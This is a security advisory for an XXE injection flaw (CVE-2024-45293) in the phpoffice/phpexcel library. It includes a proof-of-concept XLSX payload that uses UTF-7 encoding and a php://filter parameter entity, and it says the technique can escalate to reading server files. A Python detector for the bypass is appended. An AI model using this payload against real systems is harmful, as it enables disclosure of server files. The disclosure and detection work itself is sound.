XML External Entity (XXE) Injection Affecting phpoffice/phpexcel package, versions >=0.0.0


Severity: high

CVSS assessment made by Snyk's Security Team.

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.05% (25th percentile)

  • Snyk ID: SNYK-PHP-PHPOFFICEPHPEXCEL-9299761
  • published: 7 Mar 2025
  • disclosed: 7 Oct 2024
  • credit: 0xshade, ixSly

Introduced: 7 Oct 2024

CVE-2024-45293
CWE-611

How to fix?

There is no fixed version for phpoffice/phpexcel.

Overview

Affected versions of this package are vulnerable to XML External Entity (XXE) Injection through the toUtf8 function in the XmlScanner.php file. An attacker can disclose server files and sensitive information by providing an Excel sheet with a modified XML structure, specifying UTF-7 encoding with whitespace before the = in the declaration. Due to insufficient checks for that specification, the default UTF-8 is used and conversion logic is bypassed. This can expose file contents by using the PHP filter wrapper to access the server's filesystem.

PoC

An Excel sheet (XLSX) with at least one cell containing a value is needed.

  1. Unzip the Excel sheet, and modify the xl/SharedStrings.xml file with the following value (note the space after encoding=):

<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE abc [ ... ]>

  2. The following string is encoded in base64:

<!ENTITY internal 'abc'  >

Resulting in:

PCFFTlRJVFkgaW50ZXJuYWwgJ2FiYycgID4K

  3. The string is used with a parameter entity and the PHP filter wrapper to ultimately define custom entities and call them within the XML:

<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "php://filter//resource=data://text/plain;base64,PCFFTlRJVFkgaW50ZXJuYWwgJ2FiYycgID4K" > %xxe;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&internal;</t></si></sst>

When this file is parsed by the library, the value abc should be in the original filled cell.

With the help of the PHP filter wrapper, this can be escalated to information disclosure/file read.
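As an added example (Python, not the library's PHP code), the following models the failure the Overview describes and the hardening a defender wants: a declaration parser that only recognises the encoding when the quote directly follows encoding= treats the PoC's UTF-7 declaration as UTF-8, never transcodes the +ADw- sequence, and so a DOCTYPE/ENTITY scan on the bytes misses it; the hardened variant tolerates whitespace around the = and scans the transcoded text. The regex shapes, function names and sample documents are assumptions, not PhpSpreadsheet's actual code.

```python
import codecs
import re

# Vulnerable-style extraction (assumed shape modelled on the advisory, not the
# library's real code): the quote must immediately follow 'encoding='.
NAIVE_ENCODING_RE = re.compile(rb"encoding=['\"]([A-Za-z0-9._-]+)['\"]", re.I)

# Hardened extraction: the XML declaration grammar allows whitespace on both
# sides of '=' (S? '=' S?), so tolerate it before trusting the encoding name.
ROBUST_ENCODING_RE = re.compile(rb"encoding\s*=\s*['\"]([A-Za-z0-9._-]+)['\"]", re.I)

DANGEROUS_MARKUP_RE = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.I)

def declared_encoding(xml: bytes, pattern=ROBUST_ENCODING_RE) -> str:
    """Encoding named in the XML declaration; 'utf-8' when none is recognised."""
    head = xml[:256]  # a declaration, if present, must open the document
    if not head.startswith(b"<?xml"):
        return "utf-8"
    end = head.find(b"?>")
    m = pattern.search(head[:end] if end != -1 else head)
    return m.group(1).decode("ascii").lower() if m else "utf-8"

def to_utf8_text(xml: bytes, pattern=ROBUST_ENCODING_RE) -> str:
    """Transcode the document to text using its declared encoding (fail closed)."""
    enc = declared_encoding(xml, pattern)
    try:
        codecs.lookup(enc)
    except LookupError:
        raise ValueError(f"unsupported declared encoding: {enc}")
    return xml.decode(enc, errors="replace")

def contains_doctype_or_entity(xml: bytes, pattern=ROBUST_ENCODING_RE) -> bool:
    """True when the transcoded text declares a DOCTYPE or ENTITY (reject such input)."""
    return DANGEROUS_MARKUP_RE.search(to_utf8_text(xml, pattern)) is not None

# Constructed sample after the advisory's PoC: a space after 'encoding=' and
# '+ADw-' (UTF-7 for '<') keep the DOCTYPE out of a naive byte-level scan.
UTF7_SAMPLE = (
    b"<?xml version=\"1.0\" encoding= 'UTF-7' standalone=\"yes\"?>\n"
    b"+ADw-!DOCTYPE abc [ ]>\n"
    b"<sst><si><t>x</t></si></sst>\n"
)
BENIGN_SAMPLE = b'<?xml version="1.0" encoding="UTF-8"?><sst><si><t>x</t></si></sst>'

if __name__ == "__main__":
    print("naive scan flags UTF-7 sample:", contains_doctype_or_entity(UTF7_SAMPLE, NAIVE_ENCODING_RE))
    print("robust scan flags UTF-7 sample:", contains_doctype_or_entity(UTF7_SAMPLE))
```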
